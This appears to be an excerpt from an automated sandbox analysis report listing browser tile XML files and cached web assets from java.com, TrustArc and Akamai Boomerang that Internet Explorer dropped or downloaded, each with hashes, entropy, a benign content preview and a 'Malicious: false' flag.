Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x1d5e50cf,0x01d742dc</date><accdate>0x1d5e50cf,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x1d5e50cf,0x01d742dc</date><accdate>0x1d5e50cf,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.140567764801727
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGwo+/+J4nWimI002EtM3MHdNMNxhGwo+5BJ4nWimI00Ob8K075EtMb:2d6NxQL4SZHKd6NxQkJ4SZ7YKajb
MD5:	D4E256C70E80CABF3085DAA85A378424
SHA1:	41765F3E0B1B5D1BC557919E363ECC59E8C5B2E5
SHA-256:	162A5433AFCC02FFA5E9D1DD93EFC8BBCC9E8DE7A9E2C5833F8E56CD9E9B37CC
SHA-512:	6236043B9405D5F7F74EDFCE6E97028ACF575C6676D6F800C7712DE1052D92D89532068A21D9AFA9D267B5E05CE4F78A68BBCB8D76A760E2BBBC5FA0EF1D23EA
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x1d60b326,0x01d742dc</date><accdate>0x1d60b326,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x1d60b326,0x01d742dc</date><accdate>0x1d63157d,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.060355510332473
Encrypted:	false
SSDEEP:	12:TMHdNMNx0nZEIEJ4nWimI002EtM3MHdNMNx0nZEIEJ4nWimI00ObxEtMb:2d6Nx0Zd64SZHKd6Nx0Zd64SZ7nb
MD5:	924F4E913AAA09BEAC5468228CDFAC64
SHA1:	AA740BAAC12F11C9A7544AA24DB4FB35378F1C2C
SHA-256:	3C2BB959BEA31D07B3981ECAA45EA6B8E2C0979689F260171D2525FDF8F6FC90
SHA-512:	E60E41BB35B986D9F456EF16936673DFB426B8FC8CBF5D69DD9E97D2D71B71FC71C1C9A9F71AA2EB6185E6102F89829F4D85C7842A13177B38943844334B6E2C
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x1d5e50cf,0x01d742dc</date><accdate>0x1d5e50cf,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x1d5e50cf,0x01d742dc</date><accdate>0x1d5e50cf,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.102242690917078
Encrypted:	false
SSDEEP:	12:TMHdNMNxxZEIEJ4nWimI002EtM3MHdNMNxxZEIEJ4nWimI00Ob6Kq5EtMb:2d6NxLd64SZHKd6NxLd64SZ7ob
MD5:	8BA23C73B9F8799E77FDDEE6B777A519
SHA1:	9D8289AB181D3A85E8935C19ED6EF4C98C124556
SHA-256:	8014B64EAA9F1AD1B27DBCF8EF24D4F7BCAD6F7C72ECCE884E7525F94FA5245E
SHA-512:	D3EA14120E13562FF4409E53D32F3AFCAD7C772B4AFAC4A85D912DE48AF89B88BEB9306E4E8D5C32AF488E5CBCC340436DF6C64C60C36F1978A7A0EE5B3F5BDC
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x1d5e50cf,0x01d742dc</date><accdate>0x1d5e50cf,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x1d5e50cf,0x01d742dc</date><accdate>0x1d5e50cf,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.097866866947177
Encrypted:	false
SSDEEP:	12:TMHdNMNxcO4nWimI002EtM3MHdNMNxcO4nWimI00ObVEtMb:2d6Nxx4SZHKd6Nxx4SZ7Db
MD5:	230491B80E7BAE7D78EE4B964FABEE0E
SHA1:	810AD9F2DFCAE9DD64E72EB1570C37BF10025E5C
SHA-256:	27DBADC3454822B040E4DF0FDC612F2CC7C10A7800A5015374CE34F1DBDFA852
SHA-512:	16EA816EFB7FCCCD84E49E73C8BFD6683DAEC3EBDBE3D8AA4931BA9A3E5361136187D56F8243C33497241E6BBF3B5B053D0578C475C25DAA6E5A05558EB487BC
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x1d5bee6a,0x01d742dc</date><accdate>0x1d5bee6a,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x1d5bee6a,0x01d742dc</date><accdate>0x1d5bee6a,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.0829255123153025
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnO4nWimI002EtM3MHdNMNxfnO4nWimI00Obe5EtMb:2d6Nxm4SZHKd6Nxm4SZ7ijb
MD5:	314DACA36A887E7E62860F5A6EED3265
SHA1:	7F2375636726FF59143029BADA8168B64D39BAD8
SHA-256:	2094BCAFA6E1997D72104DF62D9742BF482DFFF2A5575FD0F1CF15BFB26FB4C5
SHA-512:	C3C13642FE34D0F64BFA0474E92C702D1B2F8373B182A8DD671D8359DFCBF8AEB1D1196BE98D655C5E6D16520C11CC99B6E46A4BF2C9B1C38B7FD2D6D171E277
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x1d5bee6a,0x01d742dc</date><accdate>0x1d5bee6a,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x1d5bee6a,0x01d742dc</date><accdate>0x1d5bee6a,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\ynfz0jx\imagestore.dat Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	1252
Entropy (8bit):	5.511165549357704
Encrypted:	false
SSDEEP:	12:jXOplOqWlFMVaUsQsV444444wcAKyZmvebayz1Tqn2bz75rajZ0a7VN/GR6abfaf:jwOxMwUOVToYvU9Y2n75rajj7WDg/
MD5:	FC9D3DBD283BE4D4F9CA1D836181240A
SHA1:	274CDE7C3C12C223D0102407545DCA457945D6BB
SHA-256:	52ED6B9B10A887418126A18EFD82166782088AFBE26295C4D10E89CE38FBF586
SHA-512:	96285A75D6DAAF409C37F13D1D23753538ED9C891B739CF57D97A68C5A96720C3D3DFBB33173E5B392DC23F7CCFFD84EE9EC934FE0E5BDC8D9B50C7D533E9088
Malicious:	false
Preview:	.h.t.t.p.s.:././.w.w.w...j.a.v.a...c.o.m./.f.a.v.i.c.o.n...i.c.o.~............... .h.......(....... ..... .................................}h..}h..}h..}h..}h..}h..}h..}h..}h..}h..}h..}h..........\|.........................................................\|...p...............u..z\..z\..z\..z\..z\..z\..z\...............p...v...........................................................v...z..................qU..eG..eH..eG..qU......iL...u...........z..................................................jM...w..........................fH..iK..sV..gJ..fH..sV..........fH...v......................................n..m............}c...w.....................................'v.......`.......................................................e.......e...e.......................................................i......o....p.................................................v....q............................................................z...+z............................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\6.cache[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	6773
Entropy (8bit):	5.516154253697039
Encrypted:	false
SSDEEP:	96:vPon1HkyuHEi2ziv3Hg70TnmK/SEAapZ4Ru03jf0cyD/Nu0s5jAQVLuxzbi:XoUEU3EJK/17HENxyDFmWI+i
MD5:	744C2D6A085D074CF6AB0BD7A9AAF6FC
SHA1:	6FF8D54DC22F2B7B53015D2FBD28372FAA4E07B1
SHA-256:	3307962B53E30C3BE5CC8FC3145EE53E703FE69C37E9F289640C99BE2D55272E
SHA-512:	B3D2716A44DD773E84A899E0B86F9A53C2F5493362F4D831A5EB27766B4E52DFA53160721BACBF68B8195B386BA5BB337F17C07DD8753C9F51EE386666A498FC
Malicious:	false
IE Cache URL:	https://consent-pref.trustarc.com/defaultpreferencemanager/deferredjs/0D070042D9C67A68E1A4BF804E6E0E06/6.cache.js
Preview:	function Kt(){}.function vrb(){}.function frb(a){this.b=a}.function irb(a){this.b=a}.function mrb(a){this.b=a}.function prb(a){this.b=a}.function srb(a){this.b=a}.function yrb(a){this.b=a}.function Atb(a){this.b=a}.function Gv(a){throw new Tu(a)}.function Ddb(a,b){Cdb();a.Ke(a.Ce()+b)}.function XMb(a,b){YMb(a,Cgc,(yv(),Fv(b)))}.function Cdb(){Cdb=Q5b;yt((xt(),xt(),wt))}.function yt(a){!a.b&&(a.b=new Kt);return a.b}.function oi(b,a){b.setDate(a);return b.getTime()}.function ri(a,b,c,d,e,f,g){return new Date(a,b,c,d,e,f,g)}.function Uu(a){bk(this);this.g=!a?null:Sh(a);this.f=a}.function kt(a){it();var b,c;b=yt((xt(),xt(),wt));c=null;a==b&&(c=gw(ht.pg(Llc),77));if(!c){c=new jt(Llc);a==b&&ht.qg(Llc,c)}return c}.function Fv(b){yv();var c;if(b==null){throw new aWb}if(b.length==0){throw new mVb('empty argument')}try{return Ev(b,true)}catch(a){a=YP(a);if(iw(a,11)){c=a;throw new Uu(c)}else throw a}}.function brb(a,b){spb.call(this,a);this.i=new BLb;d8(this,Qrb(new Rrb(this)));this.q=a;this.e=b;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\6MIRLP64.htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	5147
Entropy (8bit):	5.154022406877804
Encrypted:	false
SSDEEP:	96:r8qy7YxdYhAVYYn3MCysvq15MwxXkqnSqcO/2C1gigij:r8/0xChAaJvGqtx0qnSq9/bj
MD5:	14C0A5A0AF9411825A689ADE15E42B51
SHA1:	F94CC78F1D464582CEF3217C183C7C3B012E54A3
SHA-256:	5D59D71FA30604E26C815B2BCFEA777BEF1564467E2FF9B1B4DC45CA2EE0F6FE
SHA-512:	E046C5DF4CEA8E473ACAB8BE624BB30946D03F4CEEC81A03E1826EAD692FE704682E4097E9E6D39CCCC4BD469205E241A6FFEE7DF84082945D8C1A5CE6F7C839
Malicious:	false
IE Cache URL:	https://consent-pref.trustarc.com/?type=oracle6&site=oracle.com&action=notice&country=ch&locale=en&behavior=expressed&gtm=1&layout=default_eu&irm=undefined&from=https://consent.trustarc.com/
Preview:	<!doctype html>.<html>.<head>.<meta http-equiv="content-type" content="text/html; charset=UTF-8">.<meta name="viewport" content="width=device-width, initial-scale=1.0" />.<link href="images/favicon.ico" rel="shortcut icon" type="image/x-icon">.<title>TrustArc Preference Manager</title>..<meta name="keywords"..content="online trust, online privacy, email privacy, email safety, consumer privacy, brand trust, online seals, prevent spyware, privacy alert" />.<meta name="description"..content="TrustArc Cookie Consent Manager helps ensure online privacy compliance." />..<script type="text/javascript">..var baseCDNUrl = "//consent-st.trustarc.com/get?name=";..var QueryString = function() {...// This function is anonymous, is executed immediately and ...// the return value is assigned to QueryString!...var query_string = {};...var query = window.location.search.substring(1);...var vars = query.split("&");...for ( var i = 0; i < vars.length; i++) {....var pair = vars[i].split("=");....// If fi

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\EuPreferenceManager[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	27745
Entropy (8bit):	5.042943398466011
Encrypted:	false
SSDEEP:	384:xDMuxcCdWdamlRHq038IiBVT6lXcyfBWfTbQe97jl7yE:R1xcC3mlwIirT6lMEBKEeFIE
MD5:	182FC39AFF61D22162DFD04D282791E2
SHA1:	737ED8C224ED9313F5325AEC984CDE6043974C51
SHA-256:	1EA22EF5CC12712E650AC15269E8E7B75904F47246CE6EB04BF0FCD42F8BED77
SHA-512:	C20168EDB22C2B2AA9454150EB7DEBB55373C7999E294482AB540DD550BF4FE443D05EA45A62D2816F59D5C4C4F11EDD4E17C23916B61787670688901828F6F9
Malicious:	false
IE Cache URL:	https://consent-pref.trustarc.com/EuPreferenceManager.css
Preview:	html, body, div, span, applet, object, iframe,.h1, h2, h3, h4, h5, h6, p, blockquote, pre,.a, abbr, acronym, address, big, cite, code,.del, dfn, em, font, img, ins, kbd, q, s, samp,.small, strike, strong, sub, sup, tt, var,.b, u, i, center,.dl, dt, dd, ol, ul, li,.fieldset, form, label, legend,.table, caption, tbody, tfoot, thead, tr, th, td {. background: transparent;. border: 0;. margin: 0;. padding: 0;. vertical-align: baseline;.}..body { font-size: 12px; font-family: "Helvetica Neue",Helvetica,Arial,sans-serif; line-height: 20px; }.body.main { background: url(images/bg.png) no-repeat center 0; line-height: 20px; }.body.pbg { background: #fff url(images/pbg.jpg) repeat-y 1px 0; }.input, textarea, select { font-size: 12px; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; }..../*INDEX.HTML*/..mainheader {}..mainHeader h1 { color: #2C2D31; font-size: 18px; display: inline-block; }..accept-decline-buttons { float: right; }.#accept_all_button{ background: no

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\T79A9-GDDN2-93ZD5-M6HUR-X83QX[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	C source, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	209939
Entropy (8bit):	5.366006952026174
Encrypted:	false
SSDEEP:	3072:1P6RsHIwj0PdUgdbs8kvdYkODdlm9AZoZXs+eSc:1msHIxHMvd8dtZoZDc
MD5:	FA4C76A7FDE62B18054CF7EB8E946012
SHA1:	B20150066A879D2B78DD3D4908F4ACD148EE66F8
SHA-256:	09EBD7F407439990AAC227E70DA23E1A819E8E30282928E324370805F480BEC4
SHA-512:	D72F5D078675C7ADBF6BFC1980712542A10668AEC9163137A2EC70A5E117F8FFDD0F06A6C4C6636E35C04F2754F33D40C65C59D452AFAA8EA4A382F24F200ABD
Malicious:	false
IE Cache URL:	https://s.go-mpulse.net/boomerang/T79A9-GDDN2-93ZD5-M6HUR-X83QX
Preview:	/. Copyright (c) 2011, Yahoo! Inc. All rights reserved.. * Copyright (c) 2011-2012, Log-Normal, Inc. All rights reserved.. * Copyright (c) 2012-2017, SOASTA, Inc. All rights reserved.. * Copyright (c) 2017, Akamai Technologies, Inc. All rights reserved.. * Copyrights licensed under the BSD License. See the accompanying LICENSE.txt file for terms.. /./ Boomerang Version: 1.720.0 b17966bb92f8ac2ddcda4ac1d9c0aaea6d2eda7b */..BOOMR_start=(new Date).getTime();function BOOMR_check_doc_domain(e){if(window){if(!e){if(window.parent===window\|\|!document.getElementById("boomr-if-as"))return;if(window.BOOMR&&BOOMR.boomerang_frame&&BOOMR.window)try{BOOMR.boomerang_frame.document.domain!==BOOMR.window.document.domain&&(BOOMR.boomerang_frame.document.domain=BOOMR.window.document.domain)}catch(t){BOOMR.isCrossOriginError(t)\|\|BOOMR.addError(t,"BOOMR_check_doc_domain.domainFix")}e=document.domain}if(e&&-1!==e.indexOf(".")&&window.parent){try{window.parent.document;return}catch(t){try{document.doma

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\a[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	downloaded
Size (bytes):	43
Entropy (8bit):	3.0314906788435274
Encrypted:	false
SSDEEP:	3:CUkwltxlHh/:P/
MD5:	325472601571F31E1BF00674C368D335
SHA1:	2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
SHA-256:	B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
SHA-512:	717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/img/header/a.gif
Preview:	GIF89a.............!.......,...........D..;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\caas_contenttypemap[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	3125
Entropy (8bit):	4.708672411255487
Encrypted:	false
SSDEEP:	24:DRW1pojcBXmQpFvjcUvpNzjcUvph1T1poApFv5pNz5phn+1poApFvNl0pNzNl0p5:DIfRbn+bFlUllbHbUb8D9p/beTbDbh
MD5:	7D8560AEF25A94AF3F959DB0AD8440EA
SHA1:	2871121A548A749D990996C6BFA30277464E82D9
SHA-256:	DA80CD5E7CA38A0D24D78256CF7D248BF8D5255140E1EF75C554EAC923E13CD5
SHA-512:	819E6640E8EB513764E929458EB8F8F39EAF96466905FBB4458FC9A7586C1A16E6E61274C0F4BCCD3FEEF1D0B226023219221D9DF2EFC5EF715D3529275BB314
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_97bc/caas_contenttypemap.json
Preview:	[{"type":"JCOM_HelpArticle","categoryList":[{"categoryName":"Content List Default","layoutName":"JCOM-HelpArticle_Link"},{"categoryName":"Content Placeholder Default","layoutName":"JCOM-HelpArticle_Detail"},{"categoryName":"Default","layoutName":"JCOM-HelpArticle_Detail"},{"categoryName":"Empty Content List Default","layoutName":""}]},{"type":"JCOM_Footer","categoryList":[{"categoryName":"Content List Default","layoutName":""},{"categoryName":"Content Placeholder Default","layoutName":"JCOM-Footer_Detail"},{"categoryName":"Default","layoutName":"JCOM-Footer_Detail"},{"categoryName":"Empty Content List Default","layoutName":""}]},{"type":"JCOM_UninstallApplet","categoryList":[{"categoryName":"Content List Default","layoutName":""},{"categoryName":"Content Placeholder Default","layoutName":"JCOM-UninstallApplet_Detail"},{"categoryName":"Default","layoutName":"JCOM-UninstallApplet_Detail"},{"categoryName":"Empty Content List Default","layoutName":""}]},{"type":"JCOM_PropertyHTML","categor

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\get[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	20646
Entropy (8bit):	5.219540701770321
Encrypted:	false
SSDEEP:	384:gjxmfkjIB21UlcgyrtayD4yody5yXyRU96y2IPyyka6yAoyyy6nywym4yy2yybyS:q4Bs8cJjBgCRY9ueIVr/xxLlLcNn5WW9
MD5:	B2C1B4A41E148456B58383C349CA4B29
SHA1:	8B8ADB9FBBB407C62A8289DAAB1259949E72BE55
SHA-256:	F1BA71D3BF034AECEECB8895E71A44F4806DBB5BCC44E46FD8FC461A774EB880
SHA-512:	14246D376ABF21E6EF7BA2670AF08968E24639F60789301D352FDE5CCCE25D27ADF98A7C7BFA751FB1CB3A413899E62B4AE0DC885DABE11BED4EEEFAE3BAB1CC
Malicious:	false
IE Cache URL:	https://consent-st.trustarc.com/get?name=combined_static_cm_minified.js
Preview:	function installPlugin(){function xpinstallCallback(url,status){if(status==0)msg="XPInstall Test: PASSED\n";else msg="XPInstall Test: FAILED\n";dump(msg);alert(msg)}xpi={"ADCookie Plugin install!":"/adcookieoptout/adcookie.xpi"};InstallTrigger.install(xpi,xpinstallCallback)}function TRUSTe_checkplugin(){if(!BrowserDetect.browser)BrowserDetect.init();if(BrowserDetect.browser=="Explorer")TRUSTe_checkPluginForIE();else TRUSTe_checkPluginForNonIE()}.function TRUSTe_checkPluginForNonIE(){if(BrowserDetect.browser=="Chrome"){var elem=document.createElement("div");elem.setAttribute("action","CheckAddonAPIVersion");document.body.appendChild(elem);elem.addEventListener("CookieEventAPIResponse",function(event){if(event.target.getAttribute("action")!="CheckAddonAPIVersion")return;TRUSTe_addVersionToDOM(event);elem.parentNode.removeChild(elem);event.stopPropagation()},false,true);var evt=document.createEvent("Event");evt.initEvent("CookieEventAPI",true,.true);elem.dispatchEvent(evt)}}function T

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\header[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	117
Entropy (8bit):	4.339316892918074
Encrypted:	false
SSDEEP:	3:FnXKP6jJGAJqjwba3fEVRVJTt8VJfB8JHBV:FnXKPmJpa30RN8VJZqv
MD5:	7C75E3C13ECB36C435F0DBB588121F1E
SHA1:	786BDF8C01C423B57F3E32FE4EDFA6BAB8E609A5
SHA-256:	47FC7E24694B95D777E8DD251A1DC715C0E92EA0DE35873C5790F776FE34C7BA
SHA-512:	2FD948BC233EBEACD28380CDCEBE5BB8AA039931BFEC2F9ACD89AFAE83B9DD76CD69E6FD46B0E52CCD29458900EF26120854168BDB285D4D4093148CCE012B89
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/translations/header.js
Preview:	define({root:!0,de:!0,es:!0,fr:!0,it:!0,ja:!0,ko:!0,nl:!0,pl:!0,"pt-BR":!0,ru:!0,sv:!0,tr:!0,"zh-CN":!0,"zh-TW":!0});

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\i18n.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	1190
Entropy (8bit):	5.22354092284205
Encrypted:	false
SSDEEP:	24:cnNQ3iRE19tuafAXP5ucA3R0sFZSMz0fec5AQxofPp16sPvV2oonQSj1pf:qUXtFGP5ucAysFZIfLAffBUopSz
MD5:	CDC1B9E99E06127C245C3E082B62C8DB
SHA1:	3584F7B136059DF16096E84A14B7093FBB1C464F
SHA-256:	E2CDEC61D821EA2D31A5232EE702D6BC3AB73CFAEF75211399CFFB48F8139D37
SHA-512:	4FE8C7FD00698DFA54FA99E509DBFBAF8D722FE06C71673288FD4E96FF85B87A604B8995ABB0E6D7ED3142237C1AB7DA8E23CE222C6DD36D66EF7A8A0A3184D2
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/js/dependencies/i18n.min.js
Preview:	!function(){"use strict";function d(o,n,e,a,t,r){n[o]&&(e.push(o),!0!==n[o]&&1!==n[o]\|\|a.push(t+o+"/"+r))}function y(o,n,e,a,t){var r=a+n+"/"+t;require._fileExists(o.toUrl(r+".js"))&&e.push(r)}function w(o,n,e){var a;for(a in n)!n.hasOwnProperty(a)\|\|o.hasOwnProperty(a)&&!e?"object"==typeof n[a]&&(!o[a]&&n[a]&&(o[a]={}),w(o[a],n[a],e)):o[a]=n[a]}var j=/(^.(^\|\/)nls(\/\|$))([^\/])\/?([^\/]*)/;define(["module"],function(o){var h=o.config?o.config():{};return{version:"2.0.6",load:function(o,r,i,n){(n=n\|\|{}).locale&&(h.locale=n.locale);var e,l,a,t=j.exec(o),u=t[1],f=t[4],s=t[5],c=f.split("-"),g=[],v={},p="";if(t[5]?e=(u=t[1])+s:(e=o,s=t[4],f=(f=h.locale)\|\|(h.locale="undefined"==typeof navigator?"root":(navigator.languages&&navigator.languages[0]\|\|navigator.language\|\|navigator.userLanguage\|\|"root").toLowerCase()),c=f.split("-")),n.isBuild){for(g.push(e),y(r,"root",g,u,s),l=0;l<c.length;l++)a=c[l],y(r,p+=(p?"-":"")+a,g,u,s);r(g,function(){i()})}else r([e],function(a){var o,t=[];for(d("root",

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\jv0_oracle[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 91 x 22
Category:	downloaded
Size (bytes):	919
Entropy (8bit):	6.420171258574878
Encrypted:	false
SSDEEP:	24:DUifmRlw/Uvzy6yDGr+492MDfywVZ2Nje:3fk8Gr+IekZ2Nje
MD5:	9AD2F2B528AB933E785FD31BA5C642D6
SHA1:	8F6519118DC9F35642C046A989302AF11EDD708D
SHA-256:	9DD4760AD78DA6F14A0EDC582C03982A9392AC676244FC762A7B0BA059C24812
SHA-512:	DB643B0921949F79B95DB9F63659E6FA988BFEFEC4F4536AFF3FF8E00C6FD5D2FAAA586F1E3039734372BCFA74BE1D50BEF7529B47C1E9D0C62FC2296F0DF07E
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/img/footer/jv0_oracle.gif
Preview:	GIF89a[.............33.......<<.....................................cc..........??....KK.99.{{....~~....--.......00....*....ii.WW....NN.............ZZ.HH....TT...................``.rr.......ff....EE.......$$.ll.oo.66.xx..........QQ.......BB.]]....''.!!................................................................................................................................................!.......,....[..........................<;......9.........@'...-........(...I.5..-...../.....#...............1...=.1.2.A.J$.........1...@...#..!...t2t-..#...`.....3......"!....W..BB...@......!..I...B.X. ......x9...P.4.(hI...X"J.@..P.6I.#..F..,..".......tl. ....r. ERl...t.F!QH!..tP.......@.D!@.R..$..@..CJ.1.....E6.$@..H....A..B.g. ....)a...........f#a0Lc...8l..)H...,.........L<.f.....!.....!s.)`.....7.........D\|.{.....dt.[7.*.O..@.A.@.F..0..3p..",.6......0.<..s. ..8X.T0.\7.(...,...0.(.4.h.8..<......;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\jv0h[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	[TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS4 Macintosh, datetime=2011:01:25 18:25:40], baseline, precision 8, 777x95, frames 3
Category:	downloaded
Size (bytes):	33382
Entropy (8bit):	7.450231632805739
Encrypted:	false
SSDEEP:	768:aFZ3oEM+kcnJbKMY24ibgwJOEtW73o79d3SP:eZ3oiJd6wJOj7QbY
MD5:	3AAFB427F71A50D3D6BDFFA76ABA4380
SHA1:	E8D483CFB9DAB0446C89666FF12A8B8E1F97CA6D
SHA-256:	F8E752CEAE01AF6482D110260838F393C84B8D822E53D9E24BE8D3EFCB57651E
SHA-512:	13DFBE537B2AC5654C2DF5F673BDB4E1CC9E54FBE457C4A05921433C1D50E45FC559C6419DB21F56071FAB9AF41ADB6B9F6B3E272B029919D1A0EFA74DF49A5B
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/img/header/jv0h.jpg
